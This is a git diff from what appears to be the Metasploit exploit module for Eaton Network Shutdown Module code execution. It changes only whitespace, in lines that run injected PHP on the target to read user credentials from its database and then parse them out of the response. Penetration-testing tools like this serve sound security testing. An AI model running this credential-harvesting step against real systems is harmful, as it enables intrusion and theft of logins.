diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index 4934570dc2..b1aeac8ed2 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Reading user credentials from the database") response = execute_php_code(php) - if not response or response.code != 200 then - print_error("Failed: Error requesting page") + if not response or response.code != 200 then + print_error("Failed: Error requesting page") return end - + credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/) return if credentials.length == 0